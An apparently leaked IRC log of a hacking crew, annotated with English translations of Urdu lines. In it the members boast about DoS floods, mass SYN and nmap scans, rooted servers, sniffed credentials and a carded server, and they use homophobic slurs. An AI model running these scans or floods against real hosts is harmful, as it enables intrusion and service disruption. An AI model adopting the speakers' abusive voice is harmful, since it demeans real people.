      :J4n3! :ravi       pts/6        Jun  7 20:31
      :J4n3! :ravi       pts/7        Jun  7 20:31    (:0.0)
      :J4n3! :ravi       pts/8        Jun  7 20:31    (:0.0)
      :J4n3! :active hmm
      :D1ck! :hahahah
      :D1ck! :scan
      :D1ck! :scan
      :D1ck! :scan
      :D1ck! ::)
      :D1ck! :india***
      :D1ck! ::P
      :J4n3! :hehe
      :J4n3! :*******************************************************************************
      :J4n3! :                           A T T E N T I O N
      :J4n3! :*******************************************************************************
      :J4n3! :               YOU  ARE  REQUESTED TO RESHELVE THE BOOKS AFTER USE
      :J4n3! :           SO THAT WE CAN MAINTAIN A CLEAN AND TIDY WORKING ENVIRONMENT
      :J4n3! :                     THANKING YOU FOR YOUR KIND CO-OPERATION
      :J4n3! :****************************************************
      :J4n3! :ok sir :)
      :D1ck! :hahahaa
      :D1ck! :thanks:)
      :D1ck! :hehe
      :D1ck! :i`m so sleeeeeeeeepy
      :D1ck! :oye if i sleep i`ll be back till 3-4
      :D1ck! :or 4-5-
      :D1ck! ::P
      :D1ck! :oye
      :D1ck! :windows?
      :D1ck! :get that webpage done :P
      :J4n3! :yeah
      :J4n3! :yeah  Inshallah tonight
      :J4n3! ::)
      :J4n3! :oye wordtel daur raha hai hahaha very fast :p
      
      "yo world tel is running quite fast"
      
      :J4n3! :patha nahi kaisay chamatkaar hogaya :/
      
      "don't know how the miracle occurred"
      
      :J4n3! :Mashallah Mashallah
      
      "good lord, good lord"
      
      :J4n3! :kahin nazar na lag jaye kameenay ko
      
      "just hope the bastard doesn't get an evil eye"
      
      :J4n3! :D1ck 
      :J4n3! :heh khamoshi of #pakistan dossed :p
      :D1ck! :?
      :D1ck! :why?
      :J4n3! :kisi aur ko karna hai ?
      
      "do you want to do anyone else?"
      
      :D1ck! :nope
      :J4n3! :coz i had a panga with its owner
      
      "because i had a quarrel with its owner"
      
      :J4n3! :tkx
      :D1ck! :dosing with out any reason 
      :D1ck! :hehee
      :J4n3! :i dont go to channel pakistan anymore
      :D1ck! :oh
      :J4n3! :though i have access there still
      :J4n3! :yaar ek baath samaj nahi aatha
      
      "dude, i can't understand one thing"
      
      :D1ck! :THATS A GOOD REASON
      :D1ck! :THATS A GOOD REASON
      :D1ck! :THATS A GOOD REASON
      :D1ck! ::P
      :D1ck! :oye
      :D1ck! :scan kya
      
      "did you scan?"
      
      :D1ck! :?
      :D1ck! :cool
      :D1ck! :????
      :D1ck! :???????????????
      :D1ck! :????????????????????????
      :J4n3! :when u do smurf attack, then ppl come back soon , i mean jaldee up hojathay hain
      
      jaldee = quickly
      
      :D1ck! :???????????????????????????????
      :J4n3! :lekin syn attack main tho gayeb hee hojathay hain
      
      "but they disappear in a syn attack"
      
      :D1ck! :??????????????????????????????????????
      :D1ck! :smurf sucks
      :J4n3! :khamoshi ek gantay say down hai phir up nahin huwa
      
      "khamoshi (the word means silence, but is used here as a server name, i guess) has been down for an hour, and has not yet come up"
      
      :J4n3! :jub wo ping time out huwa  tha thub mainay attack chor diya i mean rok liya
      
      "when the ping timed out, i stopped the (ongoing) attack"
      
      :D1ck! :smurf is only good if u have a VIRGIN and tyte ip file, with duals routers in it
      :J4n3! :lekin phir bee up nahin huwa abee thak
      
      "but still it is not up till now"
      
      :J4n3! :yeahhh
      :J4n3! :syn rox
      :D1ck! :hehe
      :J4n3! :i did ./z0ne -clo in > in &
      
      .in is the TLD for Indian sites
      
      :J4n3! :heh i do it with 8 boxes , satyanaas hojatha hai 
      
      "i do it with 8 boxes, creates sheer destruction"
      
      :D1ck! :how do u scan syn with iplist?
      :D1ck! :./synscan INDIA.log
      :D1ck! :u can do that?????
      :D1ck! :lol
      :D1ck! :;)
      :D1ck! :i do it with 35 boxes
      :D1ck! :(i`m talking about when i had roots)
      :D1ck! :now i have 4 roots
      :D1ck! ::(
      :D1ck! :or soem thing
      :D1ck! ::
      :D1ck! ::)
      :D1ck! :coz i`m now towards coding.
      :D1ck! ::P
      :D1ck! :for a while
      :D1ck! :heh
      :J4n3! :huh
      :J4n3! :good
      :J4n3! :naa i'm donig z0ne on india
      :J4n3! :then will do ./synscan in.log in eth0 100 53
      :D1ck! :kewl
      :J4n3! ::)
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck! : jeje
      :D1ck! :oh
      :D1ck! :god
      :D1ck! :look who is here
      :m4ry! :yo
      :m4ry! :faw
      :m4ry! :code 33
      :D1ck! :lahore
      :D1ck! :?
      :D1ck! :m4ry
      :D1ck! :m4ry
      :D1ck! :ah
      :D1ck! :hehehe
      :m4ry! :lahore owns yew
      :m4ry! :WOL
      :D1ck! :hehehe
      :D1ck! :man
      :m4ry! :scan it for me
      :m4ry! :my cuz is outta hours
      :m4ry! :the admin to my NS finally logged in
      :D1ck! :this is the first time i`ve seen u on IRC at  1 am
      :D1ck! :this is the first time i`ve seen u on IRC at  1 am
      :m4ry! :haha
      :D1ck! :hahaha
      :m4ry! :my cuz has O'levels
      :m4ry! :and he's online rightn ow
      :m4ry! :so Sup
      :D1ck! :LOL
      :D1ck! :not much
      :D1ck! :bored
      :D1ck! :oh
      :D1ck! :owned example net's NS
      :D1ck! :but lost it that very second
      :D1ck! ::/
      :m4ry! :oh
      :m4ry! :btw
      :m4ry! :btw
      :D1ck! :6 am
      :m4ry! :add a examplenet acct for me
      :D1ck! :they were in
      :m4ry! :i can use ithere
      :D1ck! :
      :D1ck! :i dont have example, any more
      :m4ry! :ithere = it here
      :D1ck! ::/
      :m4ry! :also, contact Rdog, tell him to add a account on the Gilgit Comsats server
      :m4ry! :i can use that here as well
      :D1ck! :i juped diz
      :D1ck! :and #delusion almosr got purged
      :m4ry! :i lost 2 more linux ooxes :/
      :m4ry! :LOL
      :m4ry! :aww
      :m4ry! :RR..?
      :D1ck! :hehe
      :D1ck! :Rdog?
      :m4ry! :get it purged man
      :D1ck! :he wants ISP's
      :m4ry! :DoS rapt0r/pr0be
      :D1ck! :frtom me
      :D1ck! ::p
      :D1ck! :i will :)
      :D1ck! :hehe
      :m4ry! :lol
      :D1ck! :yep
      :m4ry! :add the damn accounts
      :m4ry! :and let me know
      :D1ck! :i ookover 4 diz's boxes
      :m4ry! :and btw, the example admin is a chick
      :D1ck! :oki
      :m4ry! :aain? :P~
      :m4ry! :again? :P~
      :D1ck! ::P~
      :D1ck! :gegege
      :D1ck! :yep
      :D1ck! :<m4ry> again? :P~
      :D1ck! :yep
      :D1ck! :owned 4 .uk
      :D1ck! :'s
      :m4ry! :keep Diz's boxen
      :D1ck! :he is lame
      :m4ry! :i'll gety started on the SunOS version of TFN
      :D1ck! :his pass was 'fuck111'
      :D1ck! :hehe
      :D1ck! :ok
      :D1ck! :good.
      :m4ry! :we'll have the bifiggerst FN in the world
      :m4ry! :since ADM
      :m4ry! :lol
      :D1ck! :yep
      :m4ry! :he's lame
      :D1ck! :jane got 20000+
      :m4ry! :his pass was 'jusjesus' last time
      :D1ck! :hehe
      :m4ry! :(that's what faisal told me)
      :m4ry! :and u told me
      :D1ck! :jane + m4ry + rave + dick
      :D1ck! :oh god
      :D1ck! :bandwith
      :D1ck! :hahahaha
      :D1ck! :nope
      :m4ry! : = Major FN
      :m4ry! :shit
      :m4ry! :i hate this 
      :m4ry! :keyboard
      :J4n3! :save2 add J4n3 * J4n3 100 1 4
      :J4n3! :save2 add d1ck * d1ck 100 1 4
      :D1ck! :are u in BX?
      :m4ry! :J4n3 
      :m4ry! :sup
      :m4ry! :d00d
      :m4ry! :man i'm hungry
      :J4n3! :save2 add m4ry * m4ry 100 1 4
      :J4n3! :m4ry :p
      :D1ck! :hahaha
      :m4ry! :yeah
      :m4ry! :BX
      :m4ry! :from24.* box
      :m4ry! :pretty fast
      :D1ck! :order a pizza
      :J4n3! :save2 save
      :m4ry! :T1 i think
      :D1ck! :hehe
      :J4n3! :save2 nick Canopus
      :D1ck! :yep
      :m4ry! :0-usage
      :m4ry! :the admin logs in wvery once in a while to run his sweet oracle
      :D1ck! :m4ry: when u coming back to khi?
      :m4ry! :prolly a week or so
      :m4ry! :u checked out the new kernel (2.2.15)?
      :D1ck! :<Doggy^:#Linuxsex> lol
      :D1ck! :<BiGm|kE:#Linuxsex> ratios suck ass that's why
      :D1ck! :<Doggy^:#Linuxsex> try #cracks here on undernet
      :m4ry! :well
      :D1ck! :FUCK DOGGY
      :m4ry! :new isn't exactly true
      :D1ck! :SUCKING UOP LINUXSEX'S BALLS
      :D1ck! :$#%#@
      :m4ry! :LOL
      :m4ry! :DoS him
      :m4ry! :kick/ban him
      :D1ck! :m4ry: nope, is it stable?
      :D1ck! :the kernel
      :D1ck! :hahaha
      :m4ry! :DAMN L33T KERNEL
      :m4ry! :get it
      :m4ry! :16 megs worth the download
      :D1ck! :kewl
      :J4n3! :save2 .add D1ck * D1ck 100 1 4
      :D1ck! :ok i will
      :m4ry! :i was wondering
      :m4ry! :do you want to merge K1dd13 and tr1be?
      :m4ry! :all local guys
      :m4ry! :u can deal with the stupid people
      :m4ry! :kick them out
      :m4ry! :talk with faisal
      :m4ry! :paw
      :D1ck! :no merge
      :m4ry! :./clear :P~
      :D1ck! ::P
      :m4ry! :ok
      :m4ry! :no merge
      :D1ck! :parents?
      :m4ry! :undetstood
      :m4ry! :understood
      :m4ry! :yeah
      :m4ry! :aunties
      :D1ck! :cool
      :m4ry! :get a husmail account
      :m4ry! :www.hushmail.com
      :m4ry! :damn l33t
      :D1ck! :ah
      :D1ck! :hahaa
      :D1ck! :ARW
      :D1ck! :lol
      :D1ck! :okies
      :m4ry! :encrypted email from user-to-user (of husmail only)
      :D1ck! :hetaaz: i`m geting k1dd13-online.org
      :D1ck! :m4ry
      :m4ry! :haha
      :D1ck! :check this
      :m4ry! :l33t
      :m4ry! :yeah..?
      :D1ck! :www9.example.com/k1dd13
      :D1ck! :and
      :D1ck! :www9.example.com/k1dd13/Article3.html
      :D1ck! :and
      :D1ck! :0-day section coming up
      :D1ck! :password protected 
      :D1ck! :just for u me jane rave and bob
      :D1ck! :in smaller versionm just for #k1dd13
      :D1ck! :hehe
      :D1ck! ::)
      :m4ry! :l33t
      :D1ck! ::)
      :m4ry! :MAN
      :m4ry! :get PGP
      :m4ry! :mail me ur PGP key
      :m4ry! :ripgut@example.net
      :D1ck! :ok
      :m4ry! :pgp owns you
      :D1ck! :CERT.ORG?
      :m4ry! ::)
      :D1ck! :hehhe
      :m4ry! :what about cert?
      :D1ck! :ok i`ll get it?
      :D1ck! :ok i`ll get it
      :m4ry! ::)
      :m4ry! :yeah
      :m4ry! :do that
      :D1ck! :btw
      :D1ck! :www.example.com owned by rootworm
      :D1ck! :JP SUX
      :D1ck! :$@
      :m4ry! :NO WAY
      :D1ck! :JP = qu33r
      :D1ck! :heh
      :m4ry! :COOL
      :D1ck! :yep
      :m4ry! :JP is gay
      :m4ry! :known fact
      :m4ry! :he fucked his dad
      :D1ck! :yep
      :D1ck! :fucked his dad?
      :D1ck! :how/why/what/when
      :D1ck! :?
      :m4ry! :shit
      :m4ry! :i'm out
      :m4ry! :aunty needs fone
      :m4ry! :only 1 fone :/
      :D1ck! :<Doggy^:#Linuxsex> wow
      :D1ck! :HAHAHAHAHAHA
      :D1ck! :Time 10:55 m4ry on chat, mom at back 
      :D1ck! :HAHAAHAHAHAHHAHAHAH
      :J4n3! :LOOOOOOOOL
      :J4n3! :what a h4x0r
      :D1ck! ::p
      :D1ck! :keke
      :D1ck! :d4v3
      :D1ck! :done with password.html
      :D1ck! :?
      :D1ck! :i`m getting LEET 0-day section
      :D1ck! ::)
      :J4n3! :kewl wait 30 mins plz
      :J4n3! :kuch panga horaha hai set kartha hon
      
      "some nonsense is going on, i am trying to set it"
      
      :D1ck! :oki
      :J4n3! :lekin masla doosra h ia
      
      "but the reason is something else"
      
      :J4n3! :mujay yaad hee nahi raha
      
      "I haven't been able to remember"
      
      :J4n3! :abee tho meray system par sahi chal jayega lekin
      
      "For now, it will run from my system"
      
      :J4n3! :i think example.com doesn't give u authority to run cgi
      :D1ck! :oh
      :J4n3! :we have to put a java encryption
      :D1ck! :oh
      :D1ck! :oki
      :D1ck! ::(
      :J4n3! :don worry i'll put a tight java wait
      :D1ck! :oki
      :J4n3! :i'm on java archieve page,  lemme select one
      :D1ck! :oki
      :D1ck! :J4n3
      :D1ck! :how manys
      :D1ck! :boxes intotal u have?
      :J4n3! :40 sparc
      :J4n3! :and donno about linux
      :D1ck! :wow 
      :D1ck! :cool
      :J4n3! :i rmoved x86's from my list
      :J4n3! :coz dont have rootkit
      :D1ck! :shit
      :J4n3! :but till tomorrow i'll have 70 sparc's
      :D1ck! :u should have given them to meh
      :D1ck! ::P
      :D1ck! :coooool
      :J4n3! :hmmm :(
      :D1ck! :./synscan 61 61.log eth0 100 111 &
      :J4n3! :don worry i'll give them to u now on
      :D1ck! :w00p
      :J4n3! :hehe
      :D1ck! :hehehe oki
      :J4n3! :oye
      :J4n3! :u know what
      :D1ck! :yeah?
      :D1ck! :what?
      :D1ck! :????
      :J4n3! :i did that synscan from j0e's box
      :D1ck! :yep and?
      :J4n3! :and he got emails from all edu's and too many severs
      :J4n3! :shit he's wondering who did it
      
      it seems they are using their buddies' boxes to do syn scans
      
      :D1ck! :HAHAHAHAHA
      :J4n3! :lol
      :D1ck! :kik'
      :D1ck! :lol
      :J4n3! :i removed all directorys from there
      :J4n3! :hehehe
      :D1ck! :worldtel would be flooded with mailks
      :D1ck! :user 'shahvez'
      :D1ck! :user' d4v3'
      :D1ck! :hahahahaha
      :D1ck! :okki
      :D1ck! :give me access to his server
      :D1ck! :i ferg0t the pass
      :J4n3! ::/
      :D1ck! :
      :D1ck! ::(
      :J4n3! :he changed the root pass
      :J4n3! :and closed all logins 
      :D1ck! :not the root
      :D1ck! :local
      :D1ck! :desire?
      :D1ck! :closed?
      :J4n3! :yeah desire is also not working
      :D1ck! :wtf?
      :D1ck! :thats gay
      :J4n3! :he said he'll open it tomorrow
      :J4n3! :not the others but mine
      :D1ck! :why is he acting like he pays for the server?
      :J4n3! :no yaar he's jigar  ,he's just worried
      :D1ck! :hmmmmm
      :J4n3! :actually he called me, tonight
      :D1ck! :kk
      :J4n3! :and dont have electricity , he said as soon as i get it on i'll open ur account
      :J4n3! :no actually he bought that server legally
      :J4n3! ::)
      :D1ck! :<J4n3> no actually he bought that server legally
      :D1ck! :WHAT?
      :D1ck! :u told me
      :D1ck! :that
      :D1ck! :he carded it@
      :D1ck! :??????
      :J4n3! :yup he did
      :J4n3! :but now he sent payment when he got email that the CC denied to pay
      :D1ck! :oh
      :D1ck! :LOL
      :D1ck! :ok
      :J4n3! :hehe he's in business mood 
      :J4n3! :to run shell and bnc's
      :D1ck! :oh
      :D1ck! :he's a nice guy?
      :J4n3! :yeah he is
      :J4n3! :he is jigar yaar
      :D1ck! :cool
      :J4n3! :D1ck u on windows ?
      :D1ck! :nope
      :D1ck! :lInUX:(
      :D1ck! :i`m thinking of coding some thing
      :D1ck! :gonna write code for gethostname()
      :D1ck! :so i can use scan 
      :J4n3! :: Multiple User Name and Password  
      :J4n3! :Set up multiple username and passwords for members: 
      :J4n3! :Add the code to your "enter" page, if they get it wrong, they stay, if they get it right, they can go it. You can set up multiple username and password in the script, like a member list.
      :D1ck! :and mass ath0
      :J4n3! :hmmm kewl :)
      :D1ck! :kewl
      :D1ck! :
      :D1ck! ::)))))
      :J4n3! ::))
      :J4n3! :there r some others lemme check them 
      :D1ck! :m4ry
      :m4ry! :D1ck
      :m4ry! :PAW
      :m4ry! :FAW
      :m4ry! :the works
      :D1ck! :hehe ok
      :D1ck! :;)
      :m4ry! :everything AW
      :D1ck! :Hi FREIND
      :D1ck! :HI AUNTI
      :m4ry! :i need symetrix's number
      :m4ry! :LOL
      :m4ry! :SHUTUP
      :D1ck! :hahahahaha
      :m4ry! :go ask someone in #LinuxSEx for their phphone number
      :m4ry! :i need to call someone int he US
      :m4ry! :check if dialpad works
      :m4ry! ::/
      :m4ry! :i called CERT
      :D1ck! :lemme ask sym?
      :D1ck! :hahahahaha
      :D1ck! :what did they say?
      :m4ry! :some faggot picked up and he sounded q ueer so i closed it
      :D1ck! :HAHAHAHAHAHA
      :m4ry! :seriously.. no joke
      :m4ry! :i think he was JP or someone
      :m4ry! :go ask sym
      :D1ck! :lame diz is online
      :m4ry! :or MadCamel
      :D1ck! :hahaha
      :m4ry! :or anyone
      :m4ry! :lol
      :D1ck! :hehehe
      :m4ry! :Dos him
      :D1ck! :no one's on
      :m4ry! :shiat
      :D1ck! :and i aint speaking in #linuxsex
      :D1ck! :OR
      :D1ck! :sysop
      :D1ck! :will eat my heaf
      :D1ck! ::(
      :D1ck! :head
      :m4ry! :LOL
      :m4ry! :LOL
      :m4ry! :Sysop ..
      :m4ry! :sigh
      :m4ry! :talk to him
      :D1ck! :hahaha
      :m4ry! :tell him ur really sorry etc..
      :m4ry! :SN1P3R
      :D1ck! :he lives in romania
      :m4ry! :GO TO THE US RIGHT NOW AND GIVE ME UR PHONE NUMBER
      :D1ck! :???
      :m4ry! ::-x
      :m4ry! :(gasp)
      :D1ck! :HAHAHAHA
      :D1ck! :are u feeling ok?
      :D1ck! :wtf is gasp
      :m4ry! :man
      :m4ry! :these guys are eating my head
      :m4ry! :i had to fix their modem, sound card, speakers, mic
      :D1ck! :nam
      :D1ck! :who?
      :m4ry! :nwo they want me to get dialpad woo work
      :D1ck! :HAHAHAHAHAHAHAHAHAHAHAHAHAHA
      :m4ry! :mamo's
      :m4ry! :house
      :D1ck! :LOL
      :D1ck! :ROFL
      :D1ck! :oh
      :D1ck! :
      :D1ck! :ROFL
      :D1ck! :elite HACKER m4ry;)
      :D1ck! :HEATAZ
      :m4ry! :DEATHaCeS ?
      :m4ry! :jupe?
      :D1ck! : CAN U FEEL TH BLINK
      :D1ck! :?
      :D1ck! :yeah
      :m4ry! :hacker my foot
      :D1ck! :jupe
      :m4ry! :nah
      :m4ry! :non-ansi terminal
      :D1ck! :hahahah
      :m4ry! :vt100 owns yew
      :D1ck! :oh
      :D1ck! ::/
      :m4ry! :it sux
      :D1ck! :TERM=elitehackers
      :m4ry! :black & white
      :D1ck! :telnet 127.0.0.1
      :D1ck! :bash#
      :D1ck! :lol
      :D1ck! :get mIRC
      :D1ck! :#$@#$@#$
      :m4ry! :i have it
      :m4ry! :i hate it
      :m4ry! :but it's really fucked up
      :D1ck! :oh
      :D1ck! :use it 
      :m4ry! :DALnet 
      :D1ck! :hahaha
      :m4ry! :all lahories go to DALnet
      :m4ry! :buncha faggots
      :D1ck! :heh
      :D1ck! :LOL
      :D1ck! :faggots
      :D1ck! :#ph33r-the-b33r == dalnet
      :m4ry! :Lahore = GAY land
      :D1ck! :#ph33r-the-b33r == dalnet
      :D1ck! :BWHAHAHA
      :D1ck! :LAHORE = ultra gay
      :m4ry! :i met  rave- on Darknet
      :D1ck! :yep
      :m4ry! :EFnet
      :m4ry! ::)
      :D1ck! :Interesting ports on ns3.example.net.xx (192.168170.1.99):
      :D1ck! :Port    State       Protocol  Service (RPC)
      :D1ck! :32892   open        tcp       (rusersd V2-3)
      :D1ck! :we were hanging in #k1dd13 for a while
      :D1ck! :on efnet
      :D1ck! ::P
      :m4ry! :scan UDP (same port range) to find sadmind
      :m4ry! :get example mail server
      :m4ry! :and man
      :m4ry! :PLEASE
      :m4ry! :scan this WOL shit
      :D1ck! :nmap -PS80 -sR -sS $1 -p 32000-33000
      :D1ck! :$1=argv[1]
      :D1ck! :hahaa
      :m4ry! :com192.168
      :m4ry! :192.168
      :m4ry! :.*.*
      :m4ry! :;)
      :D1ck! :well
      :D1ck! :<h4r33:#Linuxsex> HEHE
      :D1ck! :LAME MOFO
      :D1ck! :
      :D1ck! :<_cen:#Linuxsex> :)
      :m4ry! :or just add a example zccount
      :D1ck! :cen == tc
      :m4ry! :the WOL guys are stupid
      :D1ck! :MAN i lost example
      :D1ck! :
      :m4ry! : ircname  : boo hoo griddypoo
      :m4ry! :| channels : +#LINUXSEX               
      :m4ry! :LOL
      :m4ry! :(_cen)
      :D1ck! :gegege
      :m4ry! :haww
      :m4ry! :u lost example?
      :m4ry! :how?
      :m4ry! :why
      :m4ry! :when
      :m4ry! :where
      :D1ck! :g
      :D1ck! :hehe
      :m4ry! :WHY
      :m4ry! :WHYYYYY
      :m4ry! :i need 3r33t-hax0r hours
      :D1ck! :coz
      :D1ck! :rlogin was fucked
      :D1ck! :i dint have a login.trj
      :m4ry! :use vortex
      :m4ry! :<G>
      :D1ck! :HAHAHAHAHAHHA
      :D1ck! :k
      :m4ry! :ok
      :m4ry! :now i gotta sleep
      :m4ry! :my cuz has exams tommorow
      :D1ck! :i never tried vortex
      :D1ck! :LOL
      :m4ry! :and we all sleep in the same room *yuck*
      :D1ck! :ok
      :D1ck! :cya
      :D1ck! :hahaha
      :m4ry! :vortex owns ou.. i got back firewalled hosts from that
      :D1ck! :*LOL*
      :m4ry! :all ports firewalled (TPCP) except for port 1-1024
      :D1ck! :kewl
      :D1ck! :hahhaa
      :m4ry! :ok
      :m4ry! :i'm out
      :D1ck! :k
      :D1ck! :go
      :D1ck! :run
      :D1ck! :bye
      :D1ck! :
      :m4ry! :i would detach BX, but this SunOS version really fucks up and doesn't re-sttae-attack
      :m4ry! :attatch
      :m4ry! :attach
      :D1ck! :hahhaa
      :D1ck! :do it
      :D1ck! : /detach
      :D1ck! : /detach
      :D1ck! : /detach
      :m4ry! :sigh
      :m4ry! :ok
      :m4ry! :or nevermind
      :D1ck! : /away detached
      :m4ry! :i need to add a user
      :m4ry! :viper
      :m4ry! :to get better ident :)
      :D1ck! :hehe
      :m4ry! :bye
      :D1ck! :ok
      :D1ck! :bye
      :D1ck! : SignOff m4ry: 
      :D1ck! :fuck
      :D1ck! :J4n3 
      :D1ck! :the box i owned .xx
      :D1ck! :i saw h4r33 logging in with root/owned
      :D1ck! :but i dont use root/owned
      :D1ck! :so its his box
      :D1ck! :HAHAHAHAHA
      :D1ck! :lamah
      :D1ck! :brb
      :D1ck! :yo
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :dos_ nic dns-gov
      :D1ck! :dos_ nick dns-gov
      :D1ck! :dos__ nick ^6thsense
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :_EATHaCeS nick jupe-bot
      :D1ck! :__ATHaCeS nick jupe2-bot
      :D1ck! :.add D1ck * D1ck 100 1 4
      NOTICE D1ck :Handle D1ck is already in use
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      :D1ck! :dos_ nick k-rad
      :D1ck! :dos__ nick hyper
      :D1ck! :dos___ nick teardrop
      :D1ck! :dos___ nick pepsi
      :D1ck! :dos____ nick pepsi
      :D1ck! :DoS____  nick pepsi
      :D1ck! :dos_
      :D1ck! :dos_ say hehe
      :DoS_! :hehe
      :D1ck! :dos__ say hehe
      :D1ck! :dos___ say hehe
      :DoS___! :hehe
      :D1ck! :dos____ say hehe
      :DoS____! :hehe
      :D1ck! :dos_ nick k-rad-
      :D1ck! :dos___ nick neat
      :D1ck! :dos____ nick bawt
      :D1ck! :dos____ nick TotalKaoS
      :D1ck! :dos____ nick Tota1KaaS
      :D1ck! :.save
      NOTICE D1ck :Lists saved to file emech233.users
      NOTICE D1ck :Levels were written to ./mech.levels
      USER werd . . :DoS
      
      =-
      
      Day 05 June 8
      
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3 :errrrrrr
      :J4n3 :why banned ? :(
      :D1ck :?
      :D1ck :oh
      :J4n3 :heh id id
      :D1ck :i thouh
      :D1ck :oh
      :D1ck ::)
      :D1ck :d4v3 
      :J4n3 :haha k
      :D1ck :i lost my NS
      :D1ck ::(
      :J4n3 :listen
      :D1ck :):
      :D1ck :?
      :J4n3 :oh shit
      :J4n3 :bad very bad
      :D1ck :??
      :D1ck :<J4n3> listen
      :D1ck :<J4n3> listen
      :D1ck :<J4n3> listen
      :D1ck :?
      :D1ck :example.com.pk,example.net, example.com
      :D1ck :J4n3 
      :D1ck :user192-168-74-106.example.net
      :D1ck :bsd.example.com
      :D1ck :is.the.fresh.prince.of.hardcore.example.xx.us
      :D1ck :dos those 3
      :D1ck :please
      :D1ck :
      :D1ck :PLEASE
      :D1ck :PLEASE
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :D1ck :?
      :D1ck :Inspectah 
      :D1ck :inst
      :J4n3 :d1ck
      :J4n3 :.up
      :J4n3 :[ b-a-c-k ]
      :m4ry :i hate this place
      :m4ry ::)
      :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0]
      :J4n3 :[ frozen ] [ Auto-away after 15 mins - 00:01:41 ] - [J4n3-X] [1.0]
      :J4n3 :.up
      :D1ck :.op
      :D1ck :mop
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :suck
      :Sp07 :dick
      :Sp07 :and
      :Sp07 :die
      :D1ck :heh
      :D1ck :man
      :D1ck :i lost 2 NS$@$
      :D1ck :right nw
      :Sp07 :that
      :Sp07 :sucks
      :Sp07 :dick
      :D1ck :5 minutes
      :D1ck :some moron tookover
      :Sp07 :fucking #7thsphere can never get x/w
      :Sp07 :how fucking gay
      :D1ck :and his kit overwrote all my backdoors
      :D1ck :hahahaha
      :D1ck :x/q == gay
      :D1ck :x/w == gay
      :Sp07 :[03:50] <RWI> Sp07, I did answer your question. If you know so much, I can't help you anymore. :)
      :Sp07 :what a little bitch
      :Sp07 :hehe
      :D1ck :HAHAHAHA
      :D1ck :#cservice
      :D1ck :#zy
      :D1ck :#zt
      :D1ck :gay
      :D1ck :@@@@@@@@@@@@
      :D1ck :
      :Sp07 :i was asking them if 7thsphere can be registered
      :Sp07 :they said no its a "war program"
      :D1ck :hahahaha
      :Sp07 :what a fucking moron
      :D1ck :LOl
      :D1ck :fuck my mood's off
      :D1ck :coz i saw some morons nick
      :Sp07 :?
      :D1ck :'D1z4574
      :Sp07 :[03:52] <RWI> Sp07, I did help you. #7thsphere will NEVER be removed from the blacklist
      :D1ck :'D1z4574'
      :Sp07 :hahaha
      :D1ck :ROFLAMO
      :D1ck :Sp07 
      :D1ck :i`m leeeet
      :D1ck :
      :D1ck ::)
      :Sp07 :[03:52] <Sp07> why will it be never removed/
      :Sp07 :[03:52] <Sp07> ?
      :Sp07 :[03:52] <Sp07> cause your too lazy to take it off?
      :D1ck :HAHAHAHHAHAHA
      :D1ck :+b
      :D1ck :?
      :Sp07 :[03:53] *** You were kicked from #CSERVICE by X ((RWI) Too lame to be on IRC)
      :Sp07 :hehe
      :D1ck :lol
      :Sp07 :let me message that whore
      :D1ck :./dso
      :D1ck :./dos
      :D1ck :oki
      :Sp07 :not yet
      :Sp07 :ill dos him
      :Sp07 :after im done talking to him
      :D1ck :oki
      :D1ck :say 'dont mess with #delusion'
      :D1ck :hahaha
      :D1ck :or i`ll dos j0h
      :D1ck :man
      :D1ck :hm
      :Sp07 :did you hack any irix?
      :D1ck :irc sucks
      :Sp07 :Sp07 is ~Sp07@delta.example.edu * ?
      :D1ck :i`m bored
      :Sp07 :yep
      :D1ck :nop
      :D1ck :i tried
      :D1ck :it hangs
      :D1ck ::)
      :D1ck :Sp07 
      :D1ck :help m
      :D1ck :me
      :Sp07 :?
      :D1ck :192.168.1.22 => ns2.example.net [21]
      :D1ck :USER root
      :D1ck :CWD ~meltahir
      :D1ck :PORT 192,168,1,22,149,231
      :D1ck :LIST mod*
      :D1ck :TYPE I
      :Sp07 :ACTION helps d1ck
      :D1ck :PORT 192.168,1,22,149,232
      :D1ck :TYPE A
      :D1ck :NLST mod_perl-1.24.tar.gz
      :D1ck :what the fuck?
      :Sp07 :thats h4r33s shell
      :Sp07 :hehahaha
      :Sp07 :e
      :D1ck :thats the root pass for ns2.example.net ?
      :Sp07 :no
      :D1ck :nope its not
      :D1ck :its on a subnet
      :D1ck :then?
      :Sp07 :then?
      :Sp07 :I dunno
      :Sp07 :where are you sniffing from?
      :Sp07 :umm doesnt it have to be the same network?
      :D1ck :tango.example.com
      :D1ck :dunno
      :Sp07 :192.168.1.1 192.168.1.10
      :Sp07 :yeah
      :Sp07 :just wait
      :Sp07 :and I think you wioll get someones password
      :D1ck :oki
      :Sp07 :I got that sometimes
      :Sp07 :where it wouldnt show the password
      :Sp07 :or when it wouldnt show user and pass
      :Sp07 :some fucker was dosing me today =(
      :D1ck :oh
      :Sp07 :some pussy
      :D1ck :haha
      :Sp07 :was it you?
      :D1ck :weeeeeena
      :Sp07 :j/k
      :D1ck ::(
      :Sp07 :they dosed my friends shell
      :D1ck :OH Sp07 
      :D1ck :potheads.com?
      :Sp07 :but when I got on this I dont think they could dos it no mor
      :Sp07 :yeah
      :Sp07 :.net
      :D1ck :make me a VHOST
      :Sp07 :I cant
      :D1ck :h4r33.is.a.fucking.example.com
      :Sp07 :thats a good thing
      :Sp07 :heeh
      :D1ck :h4r33.and.grid.are.fucking.example.com
      :D1ck :hehe
      :Sp07 :why you complimenting him??
      :Sp07 :im a pothead
      :Sp07 :hehe
      :D1ck :oh
      :D1ck :what does it mean btw :P
      :D1ck :?
      :Sp07 :someone who smokes lots of weed
      :Sp07 :hahaha
      :Sp07 :pot-heads
      :Sp07 :pot = weed
      :D1ck :oh
      :D1ck :i get tons f weed
      :D1ck :but
      :D1ck :i dont do it
